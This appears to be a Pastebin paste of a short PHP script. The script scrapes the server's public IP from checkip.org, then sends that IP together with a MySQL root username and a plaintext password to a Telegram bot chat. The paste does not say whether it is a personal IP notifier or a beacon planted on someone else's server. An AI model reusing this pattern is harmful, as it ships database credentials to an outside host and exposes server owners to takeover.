Advertisement
AlexaMP

AlexaMP Tools #3

Jun 29th, 2019
707
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.88 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. $ssl = "http://";
  5. $port = "80";
  6. $file = "core.php";
  7.  
  8. error_reporting(0);
  9. $getmyloc = curl_init();
  10. curl_setopt($getmyloc, CURLOPT_URL, "http://www.checkip.org/");
  11. curl_setopt($getmyloc, CURLOPT_SSL_VERIFYPEER, false);
  12. curl_setopt($getmyloc, CURLOPT_RETURNTRANSFER, 1);
  13. curl_setopt($getmyloc, CURLOPT_FOLLOWLOCATION, 1);
  14. $response = curl_exec($getmyloc);
  15. $babi = explode('<span style="color: #5d9bD3;">' , $response);
  16. $anjing = explode('</span>' , $babi[1]);
  17. $newip = $anjing[0];
  18. $testpage = "$ssl$newip:$port/$file";
  19. $message        = "
  20. New IP Has Refresh!!
  21. $testpage
  22.  
  23. IP : $anjing[0]
  24. Port : 3306
  25.  
  26. Username : root
  27. Password : Arief9087#
  28.  
  29. Good Luck!!!!
  30. ";
  31. $pesan          = urlencode($message);
  32. $openport = file_get_contents("https://api.telegram.org/botFuckYourAPI/sendMessage?chat_id=681149460&text=$pesan");
  33. if($openport){
  34. echo "success";
  35. }else{
  36. echo "fail";
  37. }
  38. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement